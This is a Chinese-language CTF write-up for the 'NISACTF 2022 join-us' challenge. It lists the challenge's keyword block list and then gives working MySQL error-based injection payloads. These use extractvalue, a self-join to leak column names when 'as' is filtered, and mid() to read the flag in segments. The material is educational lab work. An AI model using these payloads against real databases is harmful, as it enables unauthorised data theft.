当前位置: 首页 > news >正文

[NISACTF 2022]join-us

news 来源:原创 2024/4/29 11:09:30 
过滤:
as
IF
rand()
LEFT
by
update
=
substring
handler
union
floor
benchmark
COLUMN
UPDATE
&
sys.schema_auto_increment_columns
&&
'1'='1'
database
case
AND
right
CAST
FLOOR
left
updatexml
DATABASES
BENCHMARK
BY
sleep
DATABASE
insert
anandd
ascii
CAST()

其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。

database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库

1'||(select * from aa)#或者将||换成or,爆出sqlsql库。-1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#
爆出output表-1' || extractvalue(1,concat(0x5c,(select*from (select*from output a join output b)c)))#
爆出data列名-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#

由于as也被过滤,无列名注入可以用join 连接

首先自连接查询出来的表,没有using条件的结果是两张表的笛卡尔积,那么列名必然会有重复的部分,而主键是不允许重复的,所以查询出来会报错,也就把列名爆出来了

select*from (select*from output a join output b)c

相关文章:

  • 15 Go的并发
  • 02-微服务的拆分规则和基于RestTemplate的远程调用
  • DAY60 84.柱状图中最大的矩形
  • U4_1:图论之DFS/BFS/TS/Scc
  • 【鸿蒙应用ArkTS开发系列】- 灌水区,鸿蒙ArkTs开发有问题可以在该帖中反馈
  • 【深入理解Typescript】—— 第一章:为什么要使用Typescript
  • Me-and-My-Girlfriend-1
  • visionOS空间计算实战开发教程Day 1:环境安装和编写第一个程序
  • 自动驾驶相关
  • 【JavaEE初阶】计算机是如何工作的
  • HarmonyOS ArkTS List组件和Grid组件的使用(五)
  • 【开源】基于微信小程序的音乐平台
  • unity DontDestroyOnLoad后跳转场景后不会出现重复物体
  • linux rsyslog综合实战2
  • 没收到Win11 23H2正式版的推送怎么升级到23H2
  • 《Java8实战》-第四章读书笔记(引入流Stream)
  • 2019年如何成为全栈工程师?
  • ECMAScript 6 学习之路 ( 四 ) String 字符串扩展
  • express + mock 让前后台并行开发
  • express如何解决request entity too large问题
  • SpiderData 2019年2月13日 DApp数据排行榜
  • use Google search engine
  • v-if和v-for连用出现的问题
  • vue学习系列(二)vue-cli
  • Wamp集成环境 添加PHP的新版本
  • 基于组件的设计工作流与界面抽象
  • 检测对象或数组
  • 开源地图数据可视化库——mapnik
  • 盘点那些不知名却常用的 Git 操作
  • 前端
  • 如何使用 JavaScript 解析 URL
  • 微信小程序上拉加载:onReachBottom详解+设置触发距离
  • 源码之下无秘密 ── 做最好的 Netty 源码分析教程
  • ​​​​​​​GitLab 之 GitLab-Runner 安装,配置与问题汇总
  • ​LeetCode解法汇总2304. 网格中的最小路径代价
  • #LLM入门|Prompt#1.8_聊天机器人_Chatbot
  • #NOIP 2014# day.1 T2 联合权值
  • #我与Java虚拟机的故事#连载18:JAVA成长之路
  • (27)4.8 习题课
  • (30)数组元素和与数字和的绝对差
  • (8)Linux使用C语言读取proc/stat等cpu使用数据
  • (SpringBoot)第七章:SpringBoot日志文件
  • (黑马C++)L06 重载与继承
  • (汇总)os模块以及shutil模块对文件的操作
  • (南京观海微电子)——COF介绍
  • (三)mysql_MYSQL(三)
  • (五)大数据实战——使用模板虚拟机实现hadoop集群虚拟机克隆及网络相关配置
  • (转)Oracle 9i 数据库设计指引全集(1)
  • (转)关于pipe()的详细解析
  • .NET Framework 和 .NET Core 在默认情况下垃圾回收(GC)机制的不同(局部变量部分)
  • .NET Micro Framework初体验(二)
  • .net wcf memory gates checking failed
  • .net 程序 换成 java,NET程序员如何转行为J2EE之java基础上(9)
  • .net 提取注释生成API文档 帮助文档
  • .NET版Word处理控件Aspose.words功能演示:在ASP.NET MVC中创建MS Word编辑器